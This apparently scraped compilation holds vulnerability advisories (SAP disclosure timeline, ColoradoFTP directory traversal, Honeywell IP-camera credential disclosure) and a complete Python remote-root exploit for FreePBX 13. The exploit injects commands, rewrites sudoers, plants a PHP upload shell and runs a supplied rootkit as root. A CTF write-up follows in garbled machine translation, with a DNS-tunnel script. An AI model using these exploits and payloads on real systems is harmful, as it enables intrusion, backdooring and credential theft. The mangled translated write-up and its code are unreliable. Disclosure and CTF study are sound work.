      mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c475c000
      write(4, "The quick brown fox jumps over t"..., 43) = 43
      close(4)                                = 0
      munmap(0x7f98c475c000, 4096)            = 0
      utime("test_string.txt", [2015/12/01-19:48:48, 2015/12/01-19:48:48]) = 0
      chmod("test_string.txt", 0664)          = 0
      [..]
       
8. Report Timeline

2016-04-21: Core Security sent an initial notification to SAP.
2016-04-22: SAP confirmed the reception of the email and requested the draft version of the advisory.
2016-04-22: Core Security sent SAP a draft version of the advisory and informed them we would adjust our publication schedule according with the release of a solution to the issues.
2016-04-25: SAP confirmed the reported vulnerabilities and assigned the following security incident tickets IDs: 1670264798, 1670264799 and 1670264800.
2016-05-10: Core Security asked SAP if they had a tentative date for publishing the security fixes.
2016-05-20: SAP informed Core Security they have a tentative release date on July 12th, 2016 (July Patch day).
2016-05-23: Core Security thanked SAP for the tentative date and informed them we would publish our security advisory accordingly upon their confirmation.
2016-06-27: Core Security requested SAP the tentative security notes numbers and links in order to add them to our security advisory.
2016-07-05: SAP informed Core Security they due to some issues found during their testing phase of the patches they were not in a position to ship the patches as part of their July patch day. They said they would be able to ship the patches with August patch day.
2016-07-06: Core Security requested SAP the specific day in August they planed to release the patches.
2016-07-20: Core Security requested again SAP the specific day in August they planed to release the patches.
2016-07-21: SAP informed Core Security they would publish their security notes on the 9th of August.
2016-08-10: Advisory CORE-2016-0006 published.
9. References

[1] http://go.sap.com/. 

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company’s strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security’s analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
HireHackking 
###################################################

01. ### Advisory Information ###

Title: Directory Traversal Vulnerability in ColoradoFTP v1.3 Prime 
Edition (Build 8)
Date published: n/a
Date of last update: n/a
Vendors contacted: ColoradoFTP author Sergei Abramov
Discovered by: Rv3Laboratory [Research Team]
Severity: High


02. ### Vulnerability Information ###

OVE-ID: OVE-20160718-0006
CVSS v2 Base Score: 8.5
CVSS v2 Vector: (AV:N/AC:M/Au:S/C:C/I:C/A:C)
Component/s: ColoradoFTP Core v1.3
Class: Path Traversal


03. ### Introduction ###

ColoradoFTP is the open source Java FTP server. It is fast, reliable and 
extendable.
Fully compatible with RFC 959 and RFC 3659 (File Transfer Protocol and 
Extensions)
this implementation makes it easy to extend the functionality with 
virtually any feature.
Well commented source code and existing plug-ins make it possible to 
shape the
FTP server just the way you want!

http://cftp.coldcore.com/

04. ### Vulnerability Description ###

The default installation and configuration of Colorado FTP Prime Edition 
(Build 8) is prone to a
security vulnerability. Colorado FTP contains a flaw that may allow a 
remote attacker to traverse directories on the FTP server.
A remote attacker (a colorado FTP user) can send a command (MKDIR, PUT, 
GET or DEL) followed by sequences (\\\..\\) to traverse directories
and create, upload, download or delete the contents of arbitrary files 
and directories on the FTP server.
To exploit the vulnerability It is important to use "\\\" at the 
beginning of string.


05. ### Technical Description / Proof of Concept Code ###

By supplying "\\\..\\..\\..\\..\\" in the file path, it is possible to 
trigger a directory traversal flaw, allowing the attacker
(anonymous user or Colorado FTP user) to upload or download a file 
outside the virtual directory.


05.01
We tried to upload a file (netcat - nc.exe), to Windows %systemroot% 
directory (C:\WINDOWS\system32\) using a PUT command:

ftp> put nc.exe \\\..\\..\\..\\Windows\\system32\\nc.exe

Netcat was successfully uploaded.


05.02
We tried to create a directory (test), using a MKDIR command:

ftp> mkdir nc.exe \\\..\\..\\..\\test

The directory test was successfully created.


06. ### Business Impact ###

This may allow an attacker to upload and download files from remote machine.


07. ### Systems Affected ###

This vulnerability was tested against: ColoradoFTP v1.3 Prime Edition 
(Build 8)
O.S.: Microsoft Windows 7 32bit
JDK: v1.7.0_79
Others versions are probably affected too, but they were not checked.


08. ### Vendor Information, Solutions and Workarounds ###

This issue is fixed in ColoradoFTP Prime Edition (Build 9),
which can be downloaded from:

http://cftp.coldcore.com/download.htm


09. ### Credits ###

Rv3Laboratory [Research Team] - www.Rv3Lab.org

This vulnerability has been discovered by:
Rv3Lab - [www.rv3lab.org] - research(at)rv3lab(dot)org
Christian Catalano aka wastasy - wastasy(at)rv3lab(dot)org
Marco Fornaro aka Chaplin89 - chaplin89(at)rv3lab(dot)org


10. ### Vulnerability History ###

July   07th, 2016: Vulnerability discovered.
July   19th, 2016: Vendor informed. [Colorado FTP team]
July   21st, 2016: Vendor responds asking for details.
July   28th, 2016: Sent detailed information to the vendor.
August 08th, 2016: Vendor confirms vulnerability.
August 10th, 2016: Vendor reveals patch release date.
August 11th, 2016: Vulnerability disclosure


11. ### Disclaimer ###

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
We accept no responsibility for any damage caused by the use or misuse of
this information.


12. ### About Rv3Lab ###

Rv3Lab is an independent Security Research Lab.
For more information, please visit [www.Rv3Lab.org]
For more information regarding the vulnerability feel free to contact the
Rv3Research Team: research(at)rv3lab(dot)org

###################################################
HireHackking 
#!/usr/bin/env python
# -*- coding, latin-1 -*- ######################################################
#                                                                              #
# DESCRIPTION                                                                  #
# FreePBX 13 remote root 0day - Found and exploited by pgt @ nullsecurity.net  #
#                                                                              #
# AUTHOR                                                                       #
# pgt - nullsecurity.net                                                       #
#                                                                              #
# DATE                                                                         #
# 8-12-2016                                                                    #
#                                                                              #
# VERSION                                                                      #
# freepbx0day.py 0.1                                                           #
#                                                                              #
# AFFECTED VERSIONS                                                            #
# FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)   #
#                                                                              #
# STATUS                                                                       #
# Fixed 08-10-2016 - http://issues.freepbx.org/browse/FREEPBX-12908            #
#                                                                              #
# TESTED AGAINST                                                               #
# * http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso          #
# * http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso          #
#                                                                              #
# TODO                                                                         #
# * SSL support (priv8)                                                        #
# * parameter for TCP port                                                     #
#                                                                              #
# HINT                                                                         #
# Base64 Badchars: '+', '/', '='                                               #
#                                                                              #
################################################################################

'''
Successful exploitation should looks like:

[*] enum FreePBX version
[+] target running FreePBX 13
[*] checking if target is vulnerable
[+] target seems to be vulnerable
[*] getting kernel version
[!] Kernel: Linux localhost.localdomain 2.6.32-504.8.1.el6.x86_64 ....
[+] Linux x86_64 platform
[*] adding 'echo "asterisk ALL=(ALL) NOPASSWD:...' to freepbx_engine
[*] triggering incrond to gaining root permissions via sudo
[*] waiting 20 seconds while incrond restarts applications - /_!_\ VERY LOUD!
[*] removing 'echo "asterisk ALL=(ALL) NOPASSWD:...' from freepbx_engine
[*] checking if we gained root permissions
[!] w00tw00t w3 r r00t - uid=0(root) gid=0(root) groups=0(root)
[+] adding view.php to admin/.htaccess
[*] creating upload script: admin/libraries/view.php
[*] uploading ${YOUR_ROOTKIT} to /tmp/23 via admin/libraries/view.php
[*] removing view.php from admin/.htaccess
[*] rm -f admin/libraries/view.php
[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23
[*] removing 'asterisk ALL=(ALL) NOPASSWD:ALL' from /etc/sudoers
[*] removing all temp files
[!] have fun and HACK THE PLANET!
'''


import base64
import httplib
import optparse
import re
from socket import *
import sys
import time


BANNER = '''\033[0;31m
################################################################################
#___________                    ________________________  ___   ____________   #
#\_   _____/______   ____   ____\______   \______   \   \/  /  /_   \_____  \  #
# |    __) \_  __ \_/ __ \_/ __ \|     ___/|    |  _/\     /    |   | _(__  <  #
# |     \   |  | \/\  ___/\  ___/|    |    |    |   \/     \    |   |/       \ #
# \___  /   |__|    \___  >\___  >____|    |______  /___/\  \   |___/______  / #
#     \/                \/     \/                 \/      \_/              \/  #
#  _______                .___                                                 #
#  \   _  \             __| _/____  ___.__.   * Remote Root 0-Day              #
#  /  /_\  \   ______  / __ |\__  \<   |  |                                    #
#  \  \_/   \ /_____/ / /_/ | / __ \ \___ |                                    #
#   \_____  /         \____ |(____  / ____|                                    #
#         \/               \/     \/\/                                         #
#                                                                              #
#       * Remote Command Execution Exploit (FreePBX 14 is affected also)       #
#       * Local Root Exploit (probably FreePBX 14 is also exploitable)         #
#       * Backdoor Upload + Execute As Root                                    #
#                                                                              #
#       * Author: pgt - nullsecurity.net                                       #
#       * Version: 0.1                                                         #
#                                                                              #
################################################################################
\033[0;m'''


def argspage():
    parser = optparse.OptionParser()

    parser.add_option('-u', default=False, metavar='<url>',
            help='ip/url to exploit')
    parser.add_option('-r', default=False, metavar='<file>',
            help='Linux 32bit bd/rootkit')
    parser.add_option('-R', default=False, metavar='<file>',
            help='Linux 64bit bd/rootkit')
    parser.add_option('-a', default='/', metavar='<path>',
            help='FreePBX path - default: \'/\'')

    args, args2 = parser.parse_args()

    if (args.u == False) or (args.r == False) or (args.R == False):
        print ''
        parser.print_help()
        print '\n'
        exit(0)

    return args


def cleanup_fe():
    print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \
            '\' from freepbx_engine'
    cmd = 'sed -i --  \' /echo \"asterisk ALL=(ALL)  NOPASSWD\:ALL\">>' \
            '\/etc\/sudoers/d\' /var/lib/asterisk/bin/freepbx_engine'
    command_execution(cmd)

    return


def cleanup_lr():
    print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \
            '\' from launch-restapps'
    cmd = 'sed -i -- \':r;$!{N;br};s/\\necho "asterisk.*//g\' ' \
            'modules/restapps/launch-restapps.sh'
    command_execution(cmd)

    return


def cleanup_htaccess():
    print '[*] removing view.php from admin/.htaccess'
    cmd = 'sed -i -- \'s/config\\\\.php|view\\\\.php|ajax\\\\.php/' \
            'config\\\\.php|ajax\\\\.php/g\' .htaccess'
    command_execution(cmd)

    return


def cleanup_view_php():
    print '[*] rm -f admin/libraries/view.php'
    cmd = 'rm -f libraries/view.php'
    command_execution(cmd)

    return


def cleanup_sudoers():
    print '[*] removing \'asterisk ALL=(ALL) NOPASSWD:ALL\' from /etc/sudoers'
    cmd = 'sudo sed -i -- \'/asterisk ALL=(ALL)  NOPASSWD:ALL/d\' /etc/sudoers'
    command_execution(cmd)

    return


def cleanup_tmpfiles():
    print '[*] removing all temp files'
    cmd = 'find / -name *w00t* -exec rm -f {} \; 2> /dev/null'
    command_execution(cmd)

    return


def check_platform(response):
    if (response.find('Linux') != -1) and (response.find('x86_64') != -1):
        print '[+] Linux x86_64 platform'
        return '64'
    elif (response.find('Linux') != -1) and (response.find('i686') != -1):
        print '[+] Linux i686 platform'
        cleanup_tmpfiles()
        sys.exit(1)
        return '32'
    else:
        print '[-] adjust check_platform() when you want to backdoor ' \
                'other platforms'
        cleanup_tmpfiles()
        sys.exit(1)


def check_kernel(response):
    if response.find('w00t') != -1:
        start = response.find('w00t') + 4
        end = response.find('w00tw00t') - 1
        print '[!] Kernel: %s' % (response[start:end].replace('\\', ''))

        return check_platform(response[start:end])


def check_root(response):
    if response.find('uid=0(root)') != -1:
        start = response.find('w00t') + 4
        end = response.find('w00tw00t') - 2
        print '[!] w00tw00t w3 r r00t - %s' % (response[start:end])
        return
    else:
        print '[-] we are not root :('
        cleanup_fe()
        cleanup_lr()
        cleanup_tmpfiles()
        sys.exit(1)


def build_request(filename):
    body = 'file=%s&name=a&codec=gsm&lang=ru&temporary=1' \
            '&command=convert&module=recordings' % (filename)
    content_type = 'application/x-www-form-urlencoded; charset=UTF-8'

    return content_type, body


def filter_filename(response):
    start = response.find('localfilename":"w00t') + 16
    end = response.find('.wav') + 4

    return response[start:end]


def post(path, content_type, body):
    h = httplib.HTTP(ARGS.u)
    h.putrequest('POST', '%s%s' % (ARGS.a, path))
    h.putheader('Host' , '%s' % (ARGS.u))
    h.putheader('Referer' , 'http://%s/' % (ARGS.u))
    h.putheader('Content-Type', content_type)
    h.putheader('Content-Length', str(len(body)))
    h.endheaders()
    h.send(body)
    errcode, errmsg, headers = h.getreply()

    return h.file.read()


def encode_multipart_formdata(fields, filename=None):
    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
    CRLF = '\r\n'
    L = []
    L.append('--' + LIMIT)
    if fields:
        for (key, value) in fields.items():
            L.append('Content-Disposition: form-data; name="%s"' % key)
            L.append('')
            L.append(value)
            L.append('--' + LIMIT)

    if filename == None:
        L.append('Content-Disposition: form-data; name="file"; filename="dasd"')
        L.append('Content-Type: audio/mpeg')
        L.append('')
        L.append('da')
    else:
        L.append('Content-Disposition: form-data; name="file"; filename="dasd"')
        L.append('Content-Type: application/octet-stream')
        L.append('')
        L.append(open_file(filename))

    L.append('--' + LIMIT + '--')
    L.append('')
    body = CRLF.join(L)
    content_type = 'multipart/form-data; boundary=%s' % (LIMIT)

    return content_type, body


def create_fields(payload):
    fields = {'id': '1', 'name': 'aaaa', 'extension': '0', 'language': 'ru',
            'systemrecording': '', 'filename': 'w00t%s' % (payload)}

    return fields


def command_execution(cmd):
    upload_path = 'admin/ajax.php?module=recordings&command=' \
            'savebrowserrecording'
    cmd = base64.b64encode(cmd)
    payload = '`echo %s | base64 -d | sh`' % (cmd)
    fields = create_fields(payload)
    content_type, body = encode_multipart_formdata(fields)
    response = post(upload_path, content_type, body)
    filename = filter_filename(response)
    content_type, body = build_request(filename)

    return post('admin/ajax.php', content_type, body)


def check_vuln():
    h = httplib.HTTP(ARGS.u)
    h.putrequest('GET', '%sadmin/ajax.php' % (ARGS.a))
    h.putheader('Host' , '%s' % (ARGS.u))
    h.endheaders()
    errcode, errmsg, headers = h.getreply()
    response = h.file.read()

    if response.find('{"error":"ajaxRequest declined - Referrer"}') == -1:
        print '[-] target seems not to be vulnerable'
        sys.exit(1)

    upload_path = 'admin/ajax.php?module=recordings&command' \
            '=savebrowserrecording'
    payload = 'w00tw00t'
    fields = create_fields(payload)
    content_type, body = encode_multipart_formdata(fields)
    response = post(upload_path, content_type, body)

    if response.find('localfilename":"w00tw00tw00t') != -1:
        print '[+] target seems to be vulnerable'
        return
    else:
        print '[-] target seems not to be vulnerable'
        sys.exit(1)


def open_file(filename):
    try:
        f = open(filename, 'rb')
        file_content = f.read()
        f.close()
        return file_content
    except IOError:
        print '[-] %s does not exists!' % (filename)
        sys.exit(1)


def version13():
    print '[*] checking if target is vulnerable'
    check_vuln()

    print '[*] getting kernel version'
    cmd = 'uname -a; echo w00tw00t'
    response = command_execution(cmd)
    result = check_kernel(response)
    if result == '64':
        backdoor = ARGS.R
    elif result == '32':
        backdoor = ARGS.r

    print '[*] adding \'echo "asterisk ALL=(ALL) NOPASSWD:...\' ' \
            'to freepbx_engine'
    cmd = 'sed -i -- \'s/Com Inc./Com Inc.\\necho "asterisk ALL=\(ALL\)\  ' \
            'NOPASSWD\:ALL"\>\>\/etc\/sudoers/g\' /var/lib/' \
            'asterisk/bin/freepbx_engine'
    command_execution(cmd)


    print '[*] triggering incrond to gaining root permissions via sudo'
    cmd = 'echo a > /var/spool/asterisk/sysadmin/amportal_restart'
    command_execution(cmd)

    print '[*] waiting 20 seconds while incrond restarts applications' \
            ' - /_!_\\ VERY LOUD!'
    time.sleep(20)

    cleanup_fe()
    #cleanup_lr()

    print '[*] checking if we gained root permissions'
    cmd = 'sudo -n id; echo w00tw00t'
    response = command_execution(cmd)
    check_root(response)

    print '[+] adding view.php to admin/.htaccess'
    cmd = 'sed -i -- \'s/config\\\\.php|ajax\\\\.php/' \
            'config\\\\.php|view\\\\.php|ajax\\\\.php/g\' .htaccess'
    command_execution(cmd)

    print '[*] creating upload script: admin/libraries/view.php'
    cmd = 'echo \'<?php  move_uploaded_file($_FILES["file"]' \
            '["tmp_name"], "/tmp/23");?>\' > libraries/view.php'
    command_execution(cmd)

    print '[*] uploading %s to /tmp/23 via ' \
            'admin/libraries/view.php' % (backdoor)
    content_type, body = encode_multipart_formdata(False, backdoor)
    post('admin/libraries/view.php', content_type, body)

    cleanup_htaccess()
    cleanup_view_php()

    print '[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1;' \
            ' rm -f /tmp/23'
    cmd = 'chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23'
    setdefaulttimeout(5)
    try:
        command_execution(cmd)
    except timeout:
        ''' l4zY w0rk '''

    setdefaulttimeout(20)
    try:
        cleanup_sudoers()
        cleanup_tmpfiles()
    except timeout:
        cleanup_tmpfiles()

    return


def enum_version():
    h = httplib.HTTP(ARGS.u)
    h.putrequest('GET', '%sadmin/config.php' % (ARGS.a))
    h.putheader('Host' , '%s' % (ARGS.u))
    h.endheaders()
    errcode, errmsg, headers = h.getreply()
    response = h.file.read()

    if response.find('FreePBX 13') != -1:
        print '[+] target running FreePBX 13'
        return 13
    else:
        print '[-] target is not running FreePBX 13'

    return False


def checktarget():
    if re.match(r'^[0-9.\-]*$', ARGS.u):
        target = ARGS.u
    else:
        try:
            target = gethostbyname(ARGS.u)
        except gaierror:
            print '[-] \'%s\' is unreachable' % (ARGS.u)

    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(5)
    result = sock.connect_ex((target, 80))
    sock.close()
    if result != 0:
        '[-] \'%s\' is unreachable' % (ARGS.u)
        sys.exit(1)

    return

def main():
    print BANNER

    checktarget()

    open_file(ARGS.r)
    open_file(ARGS.R)

    print '[*] enum FreePBX version'
    result = enum_version()

    if result == 13:
        version13()

    print '[!] have fun and HACK THE PLANET!'

    return


if __name__ == '__main__':
    ARGS = argspage()
    try:
        main()
    except KeyboardInterrupt:
        print '\nbye bye!!!'
        time.sleep(0.01)
        sys.exit(1)

#EOF
HireHackking 
1. Advisory Information
========================================
Title                   : Honeywell IP-Camera (HICC-1100PT) Unauthenticated Remote Credentials Disclosure
Vendor Homepage         : https://www.asia.security.honeywell.com
Remotely Exploitable	: Yes
Tested on Camera types	: HICC-1100PT
Reference               : https://www.asia.security.honeywell.com/Pages/product.aspx?category=720P-1.3M%20Box%20Camera&cat=HSG-ASIASECURITY&pid=HICC-1100T
Vulnerability           : Username / Password Disclosure (Critical/High)
Shodan Dork             : html:"Honeywell IP-Camera"
Date                    : 18/08/2016
Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
  

3. Description
========================================
Honeywell IP-Camera (HICC-1100PT) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.


4. Proof-of-Concept:
========================================
Simply go to the following url:
http://host:port/cgi-bin/readfile.cgi?query=ADMINID

Should return some javascript variable which contain the credentials and other configuration vars:
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; 


Request:
----------
GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
Host: host:port
Connection: close


Response:
----------
HTTP/1.0 200 OK
Connection: close
Content-type: text/html

var Adm_ID="admin";
var Adm_Pass1=“admin”;
var Adm_Pass2=“admin”;
var Language=“en”;
var Logoff_Time="0";



Login @ http://host:port/cgi-bin/chklogin.cgi


5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
HireHackking

Misc

1サインイン

難易度サインイン

与えられたフラグ入力をコピーします

2 range_download

難易度媒体

フラグ{6095B134-5437-4B21-BE52-EDC46A276297}

0x01

DNSトラフィックの分析では、DNSトンネルデータがDNS IP.ADDR=1.1.1.1に存在することがわかりました。ソート後、base64:が取得されます

CGFZC3DVCMQ6IG5ZC195EWRZIQ==

ソリューションbase64に:を取得します

Password: NSS_YYDS!

0x02

HTTPトラフィックの分析では、IP.ADDR==172.21.249.233にはHTTPセグメントダウンデータがあり、毎回リクエストヘッダー範囲の要件に従って1つのバイトのみがダウンロードされることがわかりました。ランダムダウンロードなので、順番にソートする必要があります。ソート後、暗号化された圧縮パッケージを入手できます。

照合プロセス中に、2349ビットのバイトが欠落していることがわかり、それを修正する必要があります。

0x01でzipパスワードを取得するため、バイトを爆破できます。パスワードが正しい場合は、修理が成功します。

0x03

圧縮パッケージを解凍してQRコードを取得します。

スキャン後、を取得します

5133687161454E534E6B394D4D325A7854752335666870626A42554E6A5A5A56454666C4E4786A6A62324E464D477 05557464635546D6C536148565165564659645563774E327073515863324F58465555247314555564134555555570707434 4686957444D336544684C596C42555556E633636E687165486C75644464133515157470566E4242526B6C4A54577 316C515452754D555661636E4A785955643056C4D3559557844656A4A35626C6834D6D6D5A4C51513D3DCIPHEY分析はフラグを取得しました:

Ciphey '5133687161454E534E6B394D4D325A7854752335666870626A42554E6A5A5645466C4E4786A6A62324E464D477 05557464635546D6C536148565165564659645563774E327073515863324F584655552473145555641345555555555555555555 707063444686957444D3365444684C596C4255556E6333636E687165486C756444444135157747056666E422526BB6C 4A5457316C515452754D555661636E4A785956430566C4D355557844656A4A4A35626C6834D6D5A4C51513D3D3D'可能なplaintext: '5133687161454e534e6b394d4d325a7854475235666870626a42554e6a5a5a56454666c4e47866 A62324E464D47705557464635546D6C5361485651655564659645563774E3270707351586324F584655555247314555555641345555 570706344686957444D3365444684C596C4255556E63333636E687165486C7564444413515774705666E4242526B6C4A5457316 C515452754D5555661636E4A7859556430566C4D3559557844656A4A35626C6834D6D5A4C51513D3D '(Y/N): PLAINTEXT: '5133687161454v534v6y394w4w325z7854752335666870626Z42554v6z5z5z5645466x4v47786 Z62324V464W477055574646355546W6X53614856516555646596455637774v3270707351586324U5846555524731455555555555555555555555555555555555555555555 57070634446869574444W3365444684x596x4255556v63333636v687165486x75644444413515774705666666666666v4242526y6z54457316 X515452754W5555661636V4Z7859556430566x4W3559557844656Z4Z35626X68334W6W5Z4X51513W3W '(Y/N): PLAINTEXT: 'w3w31515x4z5w6w43386x62653z4z656487559553w4x6665546559587z4v636166555w45725451 5x6137545Z4X6Y6252424v6665074775153314644657x684561786v6363336v6v65655555524x695x486445633w44447596888436070 7555431465555554137425556485U42368515370723V477365554695646556156565841635x6W645536447555555555554W464v4232 6Z68774V4X6645465Z4Z5Z6V45524Z6260786V665332574587Z523W4W493Y6V435V4541617863315 '(Y/N): Plaintext: 'D3D31515C4A5D6D43386C62653A4A656487559553D4C6650346559587A4E636166555D45725451 5C6137545A4C6B6252424E665074775153314644657C684561786E6363336E65555555524C695C486445633D4444447596864436070 7555431465555554137425556485F42368515370723E477736554695646556156565841635C6D645536664755555555555555554D44E4232 6A68774E4C64545465A4A5A6E45524A6260786E665332574587A523D4D493B6E435E4541617863315 '(Y/N): Plaintext: 'フラグ{6095b134-5437-4b21-be52-edc46a276297}'(y/n):y╭-〜七面の七面

flaintextはキャプチャザフラグ(CTF)フラグです│

│使用した形式:│

hexadecimal│

base64│

│UTF8│

base62│

base58_bitcoin│

base32│

│utf8plaintext: 'flag {6095b134-5437-4b21-be52-edc46a276297}'│ ┰┰。-七面には、そして七面大。七面─〜ちなみ、そして七面、そして七面お願いします七面

OSをインポートします

インポート時間

リクエストをインポートします

ランダムをインポートします

'cg fz c3 dv cm cm q6 ig 5z c1 95 ew rz iq=='。分割( ''):

os.system( 'nslookup' + i + '。nss.neusoft.edu.cn1.1.1.1')

time.sleep(5)

l=int(requests.head( 'http://172.21.249.233/flag.7z'、stream=true).headers ['content-length'])

a=set()

一方、len(a)!=l:

b=random.randint(0、l)

r=requests.get( 'http://172.21.249.233/flag.7z'、stream=true、headers={'range ':' bytes=' + str(b) +' - ' + str(b)}))

r.status_code==416:の場合

印刷(b)

A.Add(b)

印刷(レン(a))

0x04

サインインの難易度

フラグ:flag {zhe_ti_mu_ye_tai_bt_le_xd}

この質問では、PNG構造と一般的なツールの使用を調べます。

問題は、不必要なZLIBデータストリームをIDATデータに保存することです。これは、Binwalkを介して直接解凍できます。

binwalk -me png.png 1049983-20211222030501652-1228875315.png

3は単なるPNGです。PNGを考えすぎないでください

難しい

フラグ:

フラグ{zheshirenchude}

この質問は、PNG構造と一般的な質問の理解度を調べます

タイトルを開くPNG画像、ビンウォークには例外がありません1049983-20211222030502534-596327598.png

010Editorがオープンしたとき、CRCの例外が見つかりましたが、当面は構造に問題はありませんでした。1049983-20211222030503265-982398738.png

Opening TweakPNGは、IHDR、IDAT、およびIENDデータブロックのCRC値が正しくないことを発見しました。1049983-20211222030503999-1878144728.png 1049983-20211222030504511-275909335.png 1049983-20211222030504972-99658495.png

次に、Stegsolveを使用して表示し、写真に隠された箱があることがわかります。 IDATデータはボックス内で選択されており、表示する必要があるIDATデータの特別な機能が必要であることを示しています。1049983-20211222030505532-548234956.png

写真自体についてはそれほど多くの情報しかありません。 PNG構造から、PNG構造の観点からは、まず第一に、IHDRブロックCRCに問題があります。一般的に、画像の高さが変更されます。 CRC逆計算スクリプトを介して(または盲目的に高さ値を直接変更する)ことで、写真の下に隠された画像があることがわかります。 Stegsolveを確認して、隠されたパターン1049983-20211222030506079-1817329692.png 1049983-20211222030506755-897769183.pngを見つけました

3つのボックスは、PNG画像の一部のデータ構造を囲み、2番目のボックスはZLIBを使用してPNG画像データが圧縮されていることを示しています。ここでボックスを選択して、ZLIB圧縮データに注意を払う必要があることを示します。

3番目のボックスは、特定の圧縮ブロックデータ構造です。この写真の内容は、LIBPNGの公式Webサイトのスクリーンショットですが、実際に公式Webサイトにアクセスすると、ラベル付けされた圧縮ブロック構造が一致しないことがわかります。1049983-20211222030507373-73800850.png

数字は意図的に変更されているため、2233シリーズの数字がタイトルの特定のキーまたはヒントである必要があることがわかります。

その後、すべてのIDATデータブロックCRC値が正しくありません。すべてのCRC値をコピーします。ヘックスデコード。ヒントだとわかりました

ヒンティス[iend_and_11] _jiayou_xd。1049983-20211222030507811-734911024.png

ヒントによると、IENDを表示すると、通常のIENDデータは空で、ファイルフラグの終わりとしてのみ機能する必要があります。しかし、今ではデータがあります。1049983-20211222030508428-28381319.png

データを抽出すると、最初の4ビットは9c 78であり、ZLIBデータヘッダーは78 9cであることがわかりました。最初の4桁を変更して減圧します。それはbase64であり、その後デコードされていることがわかりました。最後に、旗の最初の段落が取得されます

フラグ{Zheshi 1049983-20211222030509073-1734863308.png

最初の段落を取得した後、ヒントの11はまだ解決されていません。表示することにより、最後のIDATデータブロックであるChunk 11が発見されます。前のものによると、ヒント2233があり、完全なデータブロック検索は2233です。データブロックの終わりには2233が含まれていることがわかりました。

前のフラグによると、これはZlib圧縮でもあり、2233の初めからCRC値までの32ヘクスの値がコピーされ、2233がZLIBデータヘッダー78 9Cに変更されると推測されます。

デコードされたデータはエンコーディングであることがわかりました。前のフラグによると、これは他の基本家族クラスのエンコードであるべきです。 BaseCrackまたはオンラインベースデコードを通じて、これはBase91であり、Renchudeとしてデコードされていることを知ることができます}

後者のフラグは、Renchude} 1049983-20211222030510746-1247567803.png 1049983-20211222030511339-234043963.png 1049983-20211222030511908-1842991030.pngです

最終フラグを取得するには、2つのセクションをマージします

フラグ{zheshirenchude}

4 PNGは非常にひどくbeatられ、常にカムバックしています

難易度シンプル

PDFを表示します

テキスト1049983-20211222030512378-1896506921.png 1049983-20211222030512820-1477296061.png 1049983-20211222030513167-1945991591.png 1049983-20211222030513542-991496449.pngでより軽くて軽くするための多くのヒントを見つけました

フラグが白のテキストに隠されていると考えて、すべてのテキストを選択してください

2番目から最後のパラグラフ1049983-20211222030514029-1509206465.pngの終わりに空白の言葉を見つけました

他の色にコピーまたは編集します

フラグを取得します

フラグ{hey_there_is_no_thing}

ここで、

です

難易度:難易度

この質問では、単純なテキスト攻撃の実用的な応用を検証します。実際の環境では、プレーンテキストファイルは、プレーンテキスト攻撃のために積極的に提供されません。自分で攻撃するために、プレーンテキストファイルまたはプレーンテキストを見つける必要があります。

圧縮パッケージには、2つのファイルライセンスとreadme.mdが含まれています

ライセンスはオープンソース証明書ファイルです

通常のオープンソースプロトコルをすべてダウンロードして、サイズを比較します

Apache2.0のサイズは非常に似ていることがわかります

githubの内蔵ライセンスファイルを使用して、それを正常に復号化する

簡単な方法もあります。多くのオープンソースライセンスは、スペースから始まります。複数の複製スペースをプレーンテキストとして直接使用できます。

6 eviptedzip

難易度シンプル1049983-20211222030514412-431078811.png

ロケーターがないQRコードを見ることができます。それを完了すると、あなたはプロンプトを取得します:一般的な暗黙の執筆

画像を分離して、圧縮パッケージを取得します

減圧後、Stegpyを使用してフラグを取得します

フラグ{do_u_kn0w_ste9py ?}

7 easysteg

難易度シンプル

最初のレイヤーは50996.zipです

スクリプト復号化再帰圧縮パッケージ300レイヤーの書き込み

8圧縮パッケージ圧縮パッケージ圧縮パッケージ

mkdir zips

mkdir zips/files

MV 50996.ZIP ./ZIPS

CD zips
